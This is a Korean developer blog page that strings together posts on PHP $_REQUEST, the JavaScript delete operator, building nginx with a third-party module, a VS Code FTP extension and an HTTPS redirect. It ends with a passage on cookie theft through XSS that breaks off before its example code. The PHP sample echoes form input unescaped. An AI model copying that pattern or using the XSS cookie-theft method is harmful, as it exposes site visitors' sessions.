Super global variables are built-in variables that are always available in all scopes.


PHP $_REQUEST

PHP $_REQUEST is a PHP super global variable which is used to collect data after submitting an HTML form.

The example below shows a form with an input field and a submit button. When a user submits the data by clicking on "Submit", the form data is sent to the file specified in the action attribute of the <form> tag. In this example, we point to this file itself for processing form data. If you wish to use another PHP file to process form data, replace that with the filename of your choice. Then, we can use the super global variable $_REQUEST to collect the value of the input field:

Example

<html>
<body>

<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
  Name: <input type="text" name="fname">
  <input type="submit">
</form>

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
  // collect value of input field
  $name = $_REQUEST['fname'];
  if (empty($name)) {
    echo "Name is empty";
  } else {
    echo $name;
  }
}
?>


</body>
</html>

'WEB > PHP' 카테고리의 다른 글

The difference between "public" and "public static"?  (0) 2021.11.23
PHP 실행 지연(delay) 시키기  (0) 2021.11.23
mb_substr  (0) 2021.09.13
PHP Superglobal - $_REQUEST  (0) 2021.08.18
블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

delete operator

WEB/JavaScript 2021. 8. 14. 20:28

The JavaScript delete operator removes a property from an object; if no more references to the same property are held, it is eventually released automatically.

Syntax

delete expression Copy to Clipboard

Where expression should evaluate to a property reference, e.g.:

delete object.property delete object['property'] Copy to Clipboard

Parameters

object

The name of an object, or an expression evaluating to an object.

property

The property to delete.

Return value

true for all cases except when the property is an own non-configurable property, in which case, false is returned in non-strict mode.

Exceptions

Throws TypeError in strict mode if the property is an own non-configurable property.

Description

Unlike what common belief suggests (perhaps due to other programming languages like delete in C++), the delete operator has nothing to do with directly freeing memory. Memory management is done indirectly via breaking references. See the memory management page for more details.

The delete operator removes a given property from an object. On successful deletion, it will return true, else false will be returned.

However, it is important to consider the following scenarios:

  • If the property which you are trying to delete does not exist, delete will not have any effect and will return true.
  • If a property with the same name exists on the object's prototype chain, then, after deletion, the object will use the property from the prototype chain (in other words, delete only has an effect on own properties).
  • Any property declared with var cannot be deleted from the global scope or from a function's scope.
    • As such, delete cannot delete any functions in the global scope (whether this is part from a function definition or a function expression).
    • Functions which are part of an object (apart from the global scope) can be deleted with delete.
  • Any property declared with let or const cannot be deleted from the scope within which they were defined.
  • Non-configurable properties cannot be removed. This includes properties of built-in objects like Math, Array, Object and properties that are created as non-configurable with methods like Object.defineProperty().

The following snippet gives a simple example:

var Employee = { age: 28, name: 'abc', designation: 'developer' } console.log(delete Employee.name); // returns true console.log(delete Employee.age); // returns true // When trying to delete a property that does // not exist, true is returned console.log(delete Employee.salary); // returns true Copy to Clipboard

Non-configurable properties

When a property is marked as non-configurable, delete won't have any effect, and will return false. In strict mode this will raise a TypeError.

var Employee = {}; Object.defineProperty(Employee, 'name', {configurable: false}); console.log(delete Employee.name); // returns false Copy to Clipboard

var, let, and const create non-configurable properties that cannot be deleted with the delete operator:

var nameOther = 'XYZ'; // We can access this global property using: Object.getOwnPropertyDescriptor(window, 'nameOther'); // output: Object {value: "XYZ", // writable: true, // enumerable: true, // configurable: false} // Since "nameOther" is added using with the // var keyword, it is marked as "non-configurable" delete nameOther; // return false Copy to Clipboard

In strict mode, this would have raised an exception.

Strict vs. non-strict mode

When in strict mode, if delete is used on a direct reference to a variable, a function argument or a function name, it will throw a SyntaxError. Therefore, to avoid syntax errors in strict mode, you must use the delete operator in the form of delete object.property or delete object['property'].

Object.defineProperty(globalThis, 'variable1', { value: 10, configurable: true, }); Object.defineProperty(globalThis, 'variable2', { value: 10, configurable: false, }); // SyntaxError in strict mode. console.log(delete variable1); // true // SyntaxError in strict mode. console.log(delete variable2); // false Copy to Clipboard

function func(param) { // SyntaxError in strict mode. console.log(delete param); // false } // SyntaxError in strict mode. console.log(delete func); // false Copy to Clipboard

Cross-browser notes

Although ECMAScript makes iteration order of objects implementation-dependent, it may appear that all major browsers support an iteration order based on the earliest added property coming first (at least for properties not on the prototype). However, in the case of Internet Explorer, when one uses delete on a property, some confusing behavior results, preventing other browsers from using simple objects like object literals as ordered associative arrays. In Explorer, while the property value is indeed set to undefined, if one later adds back a property with the same name, the property will be iterated in its old position--not at the end of the iteration sequence as one might expect after having deleted the property and then added it back.

If you want to use an ordered associative array in a cross-browser environment, use a Map object if available, or simulate this structure with two separate arrays (one for the keys and the other for the values), or build an array of single-property objects, etc.

Examples

// Creates the property adminName on the global scope. adminName = 'xyz'; // Creates the property empCount on the global scope. // Since we are using var, this is marked as non-configurable. The same is true of let and const. var empCount = 43; EmployeeDetails = { name: 'xyz', age: 5, designation: 'Developer' }; // adminName is a property of the global scope. // It can be deleted since it is created without var, // and is therefore configurable. delete adminName; // returns true // On the contrary, empCount is not configurable // since var was used. delete empCount; // returns false // delete can be used to remove properties from objects. delete EmployeeDetails.name; // returns true // Even when the property does not exist, delete returns "true". delete EmployeeDetails.salary; // returns true // delete does not affect built-in static properties. delete Math.PI; // returns false // EmployeeDetails is a property of the global scope. // Since it was defined without "var", it is marked configurable. delete EmployeeDetails; // returns true function f() { var z = 44; // delete doesn't affect local variable names delete z; // returns false } Copy to Clipboard

delete and the prototype chain

In the following example, we delete an own property of an object while a property with the same name is available on the prototype chain:

function Foo() { this.bar = 10; } Foo.prototype.bar = 42; var foo = new Foo(); // foo.bar is associated with the // own property. console.log(foo.bar); // 10 // Delete the own property within the // foo object. delete foo.bar; // returns true // foo.bar is still available in the // prototype chain. console.log(foo.bar); // 42 // Delete the property on the prototype. delete Foo.prototype.bar; // returns true // The "bar" property can no longer be // inherited from Foo since it has been // deleted. console.log(foo.bar); // undefined Copy to Clipboard

Deleting array elements

When you delete an array element, the array length is not affected. This holds even if you delete the last element of the array.

When the delete operator removes an array element, that element is no longer in the array. In the following example, trees[3] is removed with delete.

var trees = ['redwood', 'bay', 'cedar', 'oak', 'maple']; delete trees[3]; if (3 in trees) { // this is not executed } Copy to Clipboard

If you want an array element to exist but have an undefined value, use the undefined value instead of the delete operator. In the following example, trees[3] is assigned the value undefined, but the array element still exists:

var trees = ['redwood', 'bay', 'cedar', 'oak', 'maple']; trees[3] = undefined; if (3 in trees) { // this is executed } Copy to Clipboard

If instead, you want to remove an array element by changing the contents of the array, use the splice() method. In the following example, trees[3] is removed from the array completely using splice():

var trees = ['redwood', 'bay', 'cedar', 'oak', 'maple']; trees.splice(3,1); console.log(trees); // ["redwood", "bay", "cedar", "maple"] Copy to Clipboard

Specifications

Specification

ECMAScript Language Specification (ECMAScript)
# sec-delete-operator

Browser compatibility

Report problems with this compatibility data on GitHub

desktopmobileserverChromeEdgeFirefoxInternet ExplorerOperaSafariWebView AndroidChrome AndroidFirefox for AndroidOpera AndroidSafari on iOSSamsung InternetNode.jsdelete

 
 
Full support1
Full support12
Full support1
Full support4
Full support9
Full support1
Full support1
Full support18
Full support4
Full support10.1
Full support1
Full support1.0
Full support0.10.0

Legend

Full supportFull support

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

Hahaha, jump directly to nginx this, the tomcat learned before, and tomcat+nginx have not said, I installed nginx, in the use of variables in the nginx configuration file, see the use of the echo command Variable output, I also wrote in my configuration file, a test, and then gave an error, a check to know that this command is a third-party module, and then began to go to Baidu how to add third-party modules, this problem is also I got I took a lot of blogs to solve it one day, and I quickly recorded it.

Tip: All operations are inrootCompleted by the user.

The first step is to download echo-nginx-module.

download link:https://github.com/openresty/echo-nginx-module/releases

In the second step, enter the command nginx -V to view the nginx version information installed by yum, and output the corresponding version number and compilation information.

Then download the tar.gz tarball for the corresponding version of nginx

download link:http://nginx.org/en/download.html

The third step is to pass the downloaded nginx and echo-nginx-module modules.Tool uploadGo to the virtual machine, then cp to /usr/local/src directory, extract

After decompression is completed, enter the decompression directory of nginx.

Before proceeding to the next step, it is best to back up your /usr/sbin/nginx

The fourth step, configuration parameters

Enter the command: ./configure --prefix=/usr/local/nginx --add-module=/usr/local/src/echo-nginx-module-0.61Then add configuration parameters later

Is the nginx -V outputconfigure argumentsAfter the addition, add to the back, the final command is as follows:

./configure --prefix=/usr/local/nginx --add-module=/usr/local/src/echo-nginx-module-0.61 --prefix=/usr/share/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib64/nginx/modules --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --http-client-body-temp-path=/var/lib/nginx/tmp/client_body --http-proxy-temp-path=/var/lib/nginx/tmp/proxy --http-fastcgi-temp-path=/var/lib/nginx/tmp/fastcgi --http-uwsgi-temp-path=/var/lib/nginx/tmp/uwsgi --http-scgi-temp-path=/var/lib/nginx/tmp/scgi --pid-path=/run/nginx.pid --lock-path=/run/lock/subsys/nginx --user=nginx --group=nginx --with-file-aio --with-ipv6 --with-http_auth_request_module --with-http_ssl_module --with-http_v2_module --with-http_realip_module --with-http_addition_module --with-http_xslt_module=dynamic --with-http_image_filter_module=dynamic --with-http_geoip_module=dynamic --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_degradation_module --with-http_slice_module --with-http_stub_status_module --with-http_perl_module=dynamic --with-mail=dynamic --with-mail_ssl_module --with-pcre --with-pcre-jit --with-stream=dynamic --with-stream_ssl_module --with-debug --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -m64 -mtune=generic' --with-ld-opt='-Wl,-z,relro -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -Wl,-E'

The red is to be changed, this is the data on my virtual machine, the following is the error resolution, you can install the following error database before configuring the parameters, of course, if you want to solve the problem one by one until the installation Success, of course, is fine.

Error resolution

1, missing libxml2/libxslt:

  1.  
  2. ./configure: error: the HTTP XSLT module requires the libxml2/libxslt
  3.  
  4. libraries. You can either do not enable the module or install the libraries.
  5.  
  6.  
  7.  
  8. solution:
  9.  
  10. yum -y install libxml2 libxml2-dev
  11.  
  12. yum -y install libxslt-devel

2, the lack of gd-devel

  1.  
  2. ./configure: error: the HTTP image filter module requires the GD library.
  3.  
  4. You can either do not enable the module or install the libraries.
  5.  
  6.  
  7.  
  8. solution:
  9.  
  10. yum -y install gd-devel

3, the lack of ExtUtils

  1.  
  2. ./configure: error: perl module ExtUtils::Embed is required
  3.  
  4.  
  5.  
  6. solution:
  7.  
  8. yum -y install perl-devel perl-ExtUtils-Embed

4, lack of GeoIP

  1.  
  2. ./configure: error: the GeoIP module requires the GeoIP library.
  3.  
  4. You can either do not enable the module or install the library.
  5.  
  6.  
  7.  
  8. solution:
  9.  
  10. yum -y install GeoIP GeoIP-devel GeoIP-data

5, the lack of Google perftools

  1.  
  2. ./configure: error: the Google perftools module requires the Google perftools
  3.  
  4. library. You can either do not enable the module or install the library.
  5.  
  6.  
  7.  
  8. The translation is: Google perftools module needs Google perftools library, you can choose not to start or install the library
  9.  
  10. I will not enable it here, remove the --with-google_perftools_module from the parameters.

Fifth, compile

Enter: make -j2

After compiling, an nginx file will be generated in the unz directory of the nginx decompression directory. Test this file first, enter objs/nginx -t, and see the result.

The display is successful, then use this file instead of /usr/sbin/nginx this file, and then test it, it is still successful, hahaha, basically got it.

Then start nginx, if the following situation occurs, the nginx service process may be stuck, causing port 80 to be occupied.

  1.  
  2. nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
  3.  
  4. nginx: [emerg] bind() to [::]:80 failed (98: Address already in use)
  5.  
  6. nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
  7.  
  8. nginx: [emerg] bind() to [::]:80 failed (98: Address already in use)
  9.  
  10. nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
  11.  
  12. nginx: [emerg] bind() to [::]:80 failed (98: Address already in use)
  13.  
  14. nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
  15.  
  16. nginx: [emerg] bind() to [::]:80 failed (98: Address already in use)
  17.  
  18. nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
  19.  
  20. nginx: [emerg] bind() to [::]:80 failed (98: Address already in use)
  21.  
  22. nginx: [emerg] still could not bind()

Solved:

Nginx -s stop or

First check the process information: ps -aux | grep nginx and then kill the process kill process number, then restart nginx.

At this point, this third-party module is ready.

 

 

 

https://www.programmersought.com/article/8968116526/

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

 

If you see the following error while compiling nginx from source, follow the steps below:

1
2
3
4
5
6
checking for perl
 + perl version: This is perl 5, version 26, subversion 3 (v5.26.3) built for x86_64-linux-thread-multi
Can't locate ExtUtils/Embed.pm in @INC (you may need to install the ExtUtils::Embed module) (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5).
BEGIN failed--compilation aborted.


./configure: error: perl module ExtUtils::Embed is required

Issue the following by command:

1 yum install perl-ExtUtils-Embed

Result:

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
[root@CentOS-82-64-minimal nginx-1.14.1]# yum install perl-ExtUtils-Embed
Last metadata expiration check: 2:06:33 ago on Wed 08 Jul 2020 06:31:28 AM CEST.
Dependencies resolved.
================================================================================
 Package                       Arch     Version               Repository   Size
================================================================================
Installing:
 perl-ExtUtils-Embed           noarch   1.34-416.el8          AppStream    79 k
Installing dependencies:
 perl-CPAN-Meta-Requirements   noarch   2.140-396.el8         AppStream    37 k
 perl-CPAN-Meta-YAML           noarch   0.018-397.el8         AppStream    34 k
 perl-ExtUtils-Command         noarch   1:7.34-1.el8          AppStream    19 k
 perl-ExtUtils-Install         noarch   2.14-4.el8            AppStream    46 k
 perl-ExtUtils-MakeMaker       noarch   1:7.34-1.el8          AppStream   300 k
 perl-ExtUtils-Manifest        noarch   1.70-395.el8          AppStream    37 k
 perl-ExtUtils-ParseXS         noarch   1:3.35-2.el8          AppStream    83 k
 perl-JSON-PP                  noarch   1:2.97.001-3.el8      AppStream    68 k
 perl-Math-BigInt              noarch   1:1.9998.11-7.el8     BaseOS      196 k
 perl-Math-Complex             noarch   1.59-416.el8          BaseOS      108 k
 perl-Test-Harness             noarch   1:3.42-1.el8          AppStream   279 k
 perl-devel                    x86_64   4:5.26.3-416.el8      AppStream   599 k
 perl-version                  x86_64   6:0.99.24-1.el8       AppStream    67 k
 python3-pyparsing             noarch   2.1.10-7.el8          BaseOS      142 k
 systemtap-sdt-devel           x86_64   4.2-6.el8             AppStream    81 k
Installing weak dependencies:
 perl-CPAN-Meta                noarch   2.150010-396.el8      AppStream   191 k
 perl-Encode-Locale            noarch   1.05-9.el8            AppStream    21 k
 perl-Time-HiRes               x86_64   1.9758-1.el8          AppStream    61 k


Transaction Summary
================================================================================
Install  19 Packages


Total download size: 2.4 M
Installed size: 7.5 M
Is this ok [y/N]: y
Downloading Packages:
(1/19): perl-CPAN-Meta-YAML-0.018-397.el8.noarc 421 kB/s |  34 kB     00:00
(2/19): perl-CPAN-Meta-Requirements-2.140-396.e 425 kB/s |  37 kB     00:00
(3/19): perl-Encode-Locale-1.05-9.el8.noarch.rp 795 kB/s |  21 kB     00:00
(4/19): perl-ExtUtils-Command-7.34-1.el8.noarch 589 kB/s |  19 kB     00:00
(5/19): perl-CPAN-Meta-2.150010-396.el8.noarch. 1.4 MB/s | 191 kB     00:00
(6/19): perl-ExtUtils-Install-2.14-4.el8.noarch 1.5 MB/s |  46 kB     00:00
(7/19): perl-ExtUtils-Embed-1.34-416.el8.noarch 1.4 MB/s |  79 kB     00:00
(8/19): perl-ExtUtils-Manifest-1.70-395.el8.noa 1.2 MB/s |  37 kB     00:00
(9/19): perl-ExtUtils-MakeMaker-7.34-1.el8.noar 5.5 MB/s | 300 kB     00:00
(10/19): perl-ExtUtils-ParseXS-3.35-2.el8.noarc 2.9 MB/s |  83 kB     00:00
(11/19): perl-JSON-PP-2.97.001-3.el8.noarch.rpm 2.2 MB/s |  68 kB     00:00
(12/19): perl-Time-HiRes-1.9758-1.el8.x86_64.rp 2.2 MB/s |  61 kB     00:00
(13/19): perl-Test-Harness-3.42-1.el8.noarch.rp 5.2 MB/s | 279 kB     00:00
(14/19): perl-version-0.99.24-1.el8.x86_64.rpm  2.4 MB/s |  67 kB     00:00
(15/19): systemtap-sdt-devel-4.2-6.el8.x86_64.r 3.0 MB/s |  81 kB     00:00
(16/19): perl-Math-BigInt-1.9998.11-7.el8.noarc 2.7 MB/s | 196 kB     00:00
(17/19): perl-devel-5.26.3-416.el8.x86_64.rpm   5.0 MB/s | 599 kB     00:00
(18/19): perl-Math-Complex-1.59-416.el8.noarch. 1.7 MB/s | 108 kB     00:00
(19/19): python3-pyparsing-2.1.10-7.el8.noarch. 9.4 MB/s | 142 kB     00:00
--------------------------------------------------------------------------------
Total                                           6.1 MB/s | 2.4 MB     00:00
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Preparing        :                                                        1/1
  Installing       : perl-version-6:0.99.24-1.el8.x86_64                   1/19
  Installing       : perl-CPAN-Meta-Requirements-2.140-396.el8.noarch      2/19
  Installing       : perl-Time-HiRes-1.9758-1.el8.x86_64                   3/19
  Installing       : perl-ExtUtils-ParseXS-1:3.35-2.el8.noarch             4/19
  Installing       : perl-Test-Harness-1:3.42-1.el8.noarch                 5/19
  Installing       : python3-pyparsing-2.1.10-7.el8.noarch                 6/19
  Installing       : systemtap-sdt-devel-4.2-6.el8.x86_64                  7/19
  Installing       : perl-Math-Complex-1.59-416.el8.noarch                 8/19
  Installing       : perl-Math-BigInt-1:1.9998.11-7.el8.noarch             9/19
  Installing       : perl-JSON-PP-1:2.97.001-3.el8.noarch                 10/19
  Installing       : perl-ExtUtils-Manifest-1.70-395.el8.noarch           11/19
  Installing       : perl-ExtUtils-Command-1:7.34-1.el8.noarch            12/19
  Installing       : perl-Encode-Locale-1.05-9.el8.noarch                 13/19
  Installing       : perl-CPAN-Meta-YAML-0.018-397.el8.noarch             14/19
  Installing       : perl-CPAN-Meta-2.150010-396.el8.noarch               15/19
  Installing       : perl-devel-4:5.26.3-416.el8.x86_64                   16/19
  Installing       : perl-ExtUtils-Install-2.14-4.el8.noarch              17/19
  Installing       : perl-ExtUtils-MakeMaker-1:7.34-1.el8.noarch          18/19
  Installing       : perl-ExtUtils-Embed-1.34-416.el8.noarch              19/19
  Running scriptlet: perl-ExtUtils-Embed-1.34-416.el8.noarch              19/19
  Verifying        : perl-CPAN-Meta-2.150010-396.el8.noarch                1/19
  Verifying        : perl-CPAN-Meta-Requirements-2.140-396.el8.noarch      2/19
  Verifying        : perl-CPAN-Meta-YAML-0.018-397.el8.noarch              3/19
  Verifying        : perl-Encode-Locale-1.05-9.el8.noarch                  4/19
  Verifying        : perl-ExtUtils-Command-1:7.34-1.el8.noarch             5/19
  Verifying        : perl-ExtUtils-Embed-1.34-416.el8.noarch               6/19
  Verifying        : perl-ExtUtils-Install-2.14-4.el8.noarch               7/19
  Verifying        : perl-ExtUtils-MakeMaker-1:7.34-1.el8.noarch           8/19
  Verifying        : perl-ExtUtils-Manifest-1.70-395.el8.noarch            9/19
  Verifying        : perl-ExtUtils-ParseXS-1:3.35-2.el8.noarch            10/19
  Verifying        : perl-JSON-PP-1:2.97.001-3.el8.noarch                 11/19
  Verifying        : perl-Test-Harness-1:3.42-1.el8.noarch                12/19
  Verifying        : perl-Time-HiRes-1.9758-1.el8.x86_64                  13/19
  Verifying        : perl-devel-4:5.26.3-416.el8.x86_64                   14/19
  Verifying        : perl-version-6:0.99.24-1.el8.x86_64                  15/19
  Verifying        : systemtap-sdt-devel-4.2-6.el8.x86_64                 16/19
  Verifying        : perl-Math-BigInt-1:1.9998.11-7.el8.noarch            17/19
  Verifying        : perl-Math-Complex-1.59-416.el8.noarch                18/19
  Verifying        : python3-pyparsing-2.1.10-7.el8.noarch                19/19


Installed:
  perl-CPAN-Meta-2.150010-396.el8.noarch
  perl-CPAN-Meta-Requirements-2.140-396.el8.noarch
  perl-CPAN-Meta-YAML-0.018-397.el8.noarch
  perl-Encode-Locale-1.05-9.el8.noarch
  perl-ExtUtils-Command-1:7.34-1.el8.noarch
  perl-ExtUtils-Embed-1.34-416.el8.noarch
  perl-ExtUtils-Install-2.14-4.el8.noarch
  perl-ExtUtils-MakeMaker-1:7.34-1.el8.noarch
  perl-ExtUtils-Manifest-1.70-395.el8.noarch
  perl-ExtUtils-ParseXS-1:3.35-2.el8.noarch
  perl-JSON-PP-1:2.97.001-3.el8.noarch
  perl-Math-BigInt-1:1.9998.11-7.el8.noarch
  perl-Math-Complex-1.59-416.el8.noarch
  perl-Test-Harness-1:3.42-1.el8.noarch
  perl-Time-HiRes-1.9758-1.el8.x86_64
  perl-devel-4:5.26.3-416.el8.x86_64
  perl-version-6:0.99.24-1.el8.x86_64
  python3-pyparsing-2.1.10-7.el8.noarch
  systemtap-sdt-devel-4.2-6.el8.x86_64


Complete!

done!

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

date_default_timezone_set("Asia/Seoul");
블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

원격 서버에 파일을 추가하거나 수정할 때, 로컬에서 작업하고 서버에 업로드하는 것은 상당히 번거롭습니다. 그래서 텍스트 에디터 중에는 FTP로 서버에 접속해서 바로 작업할 수 있는 기능을 포함한 것이 있습니다. 대표적인 것은 에디트 플러스입니다.

프로그램 자체에 포함되지는 않았지만, 플러그인을 이용해서 FTP 기능을 추가할 수 있는 텍스트 에디터도 있습니다. 대표적인 것은 Brackets, Visual Studio Code입니다. 이번 포스트에서는 Visual Studio Code의 ftp-simple 확장기능을 이용해서 원격 서버에 접속하는 방법을 알아보겠습니다.

  • FTP 플러그인 중에는 로컬 머신과 서버를 동기화해주는 것이 있고, 서버의 파일을 직접 수정하는 것이 있습니다. ftp-simple은 직접 수정하는 확장기능입니다.
  • ftp-simple은 ftp 뿐만 아니라 sftp도 지원합니다. 서버에 SSH로 접속할 수 있다면 바로 사용할 수 있습니다.

ftp-simple 설치

  • 확장기능(Extension)에서 ftp로 검색합니다. 여러 가지 확장기능이 있는데, 그 중에서 ftp-simple을 설치합니다.

 

서버 연결 세팅

  • F1을 누른 후 ftp-simple을 입력하면 관련 항목이 나타납니다.
  • 그 중에서 ftp-simple:Config - FTP connection setting을 선택합니다.

  • 연결할 서버의 정보를 입력하고 저장합니다.
  • autosave를 true로 하면 파일을 저장할 때 서버의 파일도 자동으로 저장합니다.
  • confirm을 true로 서버에 저장하기 전에 다시 한 번 저장할 것이냐고 묻습니다. false로 하면 묻지 않고 바로 저장합니다.

  • 여러 개의 서버 정보를 넣고 싶다면 다음과 같은 형식으로 만듭니다. 중괄호 사이에 쉼표(,)가 들어간다는 것에 주의합니다.

[ { "name": "localhost", "host": "", "port": 21, "type": "ftp", "username": "", "password": "", "path": "/", "autosave": true, "confirm": true }, { "name": "localhost", "host": "", "port": 21, "type": "ftp", "username": "", "password": "", "path": "/", "autosave": true, "confirm": true } ]

 

서버에 연결하여 파일 열기

  • 서버에 있는 파일을 열려면, F1을 누른 후 ftp-simple:Open - Open the file directly from FTP server를 선택합니다.

  • 서버를 선택하고, 원하는 파일을 선택하면 편집기에 그 파일이 열립니다.

서버에 연결하여 디렉토리 열기

  • F1을 누른 후 ftp-simple:Remote directory open to workspace를 선택합니다.

  • 설정한 서버 목록이 나옵니다. 접속하려는 서버를 선택합니다.

  • 탐색기(Explorer)에 표시할 디렉토리를 선택합니다.

 

  • 탐색기에 폴더와 디렉토리 목록이 나옵니다.
  • 이제 파일 추가, 삭제, 편집 등을 할 수 있습니다.

서버에 연결 끊기

  • 서버와의 연결을 끊으려면 ftp-simple:Close all FTP connections를 실행합니다.

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

To make sure that your visitors always will be using an secured connection to your website, you have to redirect visitors that are making the first connection via HTTP. Here we make use of the permanent HTTP redirect code (HTTP status 301).

The following steps describe the configuration of Nginx to have the website loaded completely over HTTPS. Please read our background information on Securing your complete website with SSL

Configuring HTTPS per website

To comply with the specs you should first redirect visitors entering via HTTP to HTTPS. We need to configure this per worker (website), the configuration file for your site probably sits in /etc/nginx/sites-available/.

 

server {
       listen         80;
       server_name    www.servercertificates.com;
       return         301 https://$server_name$request_uri;
}

Note that the server_name needs to be changed to your own domainname and the HTTPS version of your site is available, before creating the redirect.

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

Jan 31, 2020

by Melinda Bartley

Did you know that your website uses cookies to store confidential data? Did you know hackers can easily steal your cookies? This could put your website and visitors at risk!

Cookies store all sorts of information – from ad preferences of a customer to login credentials and credit card information. Cookies are used widely across the internet and it’s scary just how often they get stolen.

If you’re a victim of cookie stealing or session hijacking, the repercussions of it are severe. Not only do you lose revenue and the trust of your visitors but you could also face legal issues and hefty fines!

But not to worry because today, we’re going to take you through everything you need to know to prevent these attacks!

In this guide, we’ll first learn how hackers steal cookies then we’ll go through the preventive measures.

TL;DR

Worried about your WordPress website? You can secure your site right now by installing a Session Hijacking & Cookie Stealing Protection Plugin. It will scan your website regularly and alert you if a hacker injects any malicious code that will enable them to steal cookies. Using the plugin, you can clean up the hack promptly & avoid repercussions.

Table of Content

 What Is Cookie Stealing?

 How Hackers Use Cross-site Scripting (XSS) To Steal Cookies & Hijack Sessions?

 How To Prevent Cookie Stealing And Session Hijacking?

 Steps Website Visitors Can Take Against Cookie Stealing

 

What Is Cookie Stealing?

As much as we wish, cookie stealing isn’t as simple as a child sticking their hand into a cookie jar! It’s a complex process and to understand what is happening, we need to touch upon the basics.

→ What Is A Cookie?

You can think of cookies as tiny bits of data. It stores information about your interaction with a website. For example, an eCommerce site would like to track a customer’s journey – the products searched for, products purchased, items abandoned in the cart, or which pages they visit.

This gives the store analytical information on what customers prefer, which pages are being visited the most, how long users stay on a page, etc. They can then use this information to tailor what’s displayed on the website according to the customer’s preferences.

Cookies give website owners insight into what works and what doesn’t. This helps them determine what they need to change or improve on their site.

Cookies are also used to display relevant ads to users. When you visit websites, you would notice advertisements being displayed.

These ads usually reflect your recent search history. For example, if you searched for ‘laptops’ on Google, you’ll notice that ads on all websites show you ads for dell. These ads are not a part of the website but are handled by services like Google Adsense.

Cookies make things convenient for both the website owner and the user. It can boost engagement and lead to more sales which is great for website owners. As for the buyer, cookies help them get a more personalized experience on a website or see ads that are more relevant.

But there are a lot of drawbacks which we’ll discuss a bit later.

[Back to Top ]

 

→ What Is A Browser Session and Session ID?

When you log into a website, a session between your computer and this website is created.

For example, when you log into Facebook, a session begins. This allows you to keep using Facebook (even if you close and reopen the web browser) until you click on ‘log out’ and end the session.

If the session wasn’t created, you would need to keep logging in every time you wanted new data. For example, if you wanted to leave your Facebook news feed and view a friend’s profile page, you will be logged out of Facebook and would need to enter your credentials again to log in and view the friend’s profile.

 

 

This is why sessions are needed. It keeps you logged in so that you can continue to browse through different web pages and navigate the website.

What’s important to note here is that every session generates a set of cookies. We can call these session cookies. And each session cookie has a unique session ID.

A website uses this ID to authenticate the user and establish a trusted connection.

For example, to log in to Facebook, you need to enter your username and password. Next, a session is created with a unique ID. Any requests you make to the Facebook website will be authenticated with this ID. So, when you want to view a different page, you would be sending a request to the Facebook server to display that page. Facebook verifies the ID and displays the content you wish to see.

Now, hackers can hijack your session and abuse this trusted connection. They can send malicious requests on your behalf. Let’s see how.

[Back to Top ]

 

→ What Are The Security Concerns With Cookies?

When cookies are generated, they can only be viewed by you – the site owner. No other website can view your cookies. They belong solely to you.

But these cookies travel across the internet. They are used by ad services and analytics services. So these cookies bounce around from server to server all across the globe. If the connection is not secure, a hacker can easily intercept and steal these cookies.

Now, you may think that if a hacker manages to get information about your shopping preferences, big deal, right?

The problem is cookies stored more than just information about your shopping preferences. It also stores bank details and personal information such as your shipping address and contact details.

If this kind of information falls into the wrong hands, it can be misused for fraudulent activities.

One of the most common ways hackers steal cookies is if they are using the same wifi as you. This kind of wifi hacking is called man-in-the-middle attacks and can take place only if both are connected to the same wireless network. This is why it’s advised to never use public wifi that is unsecured or used by many. This can also happen to users within the same computer networks.

A few other methods include packet sniffing and by exploiting a vulnerability called cross-site scripting. Today, we’re going to show you in detail how the XSS cookie stealing works.

[Back to Top ]

 

 

How Hackers Use Cross-site Scripting (XSS) To Steal Cookies & Hijack Sessions?

To show you how hackers steal cookies using cross-site scripting (XSS) attacks, we’ll use an example. Let’s assume you visit a website that has a comments section on it.

Any comment you make will be sent to the website’s database. Ideally, this comments section should be configured to accept only text in plain English. But if it accepts special characters as well, this makes it vulnerable to XSS.

A hacker can enter their own malicious codes which will be sent to the database. Once inside, the code will get executed. There are numerous codes hackers can insert into the website to run all sorts of malicious activities like creating a new website admin or stealing cookies.

To steal cookies, a hacker can enter the following code:

Note: This is not a tutorial on how to steal cookies. This article is intended to make website owners aware of how hackers can steal cookies. We do not advise you to carry out any illegal activities.

 

[php]

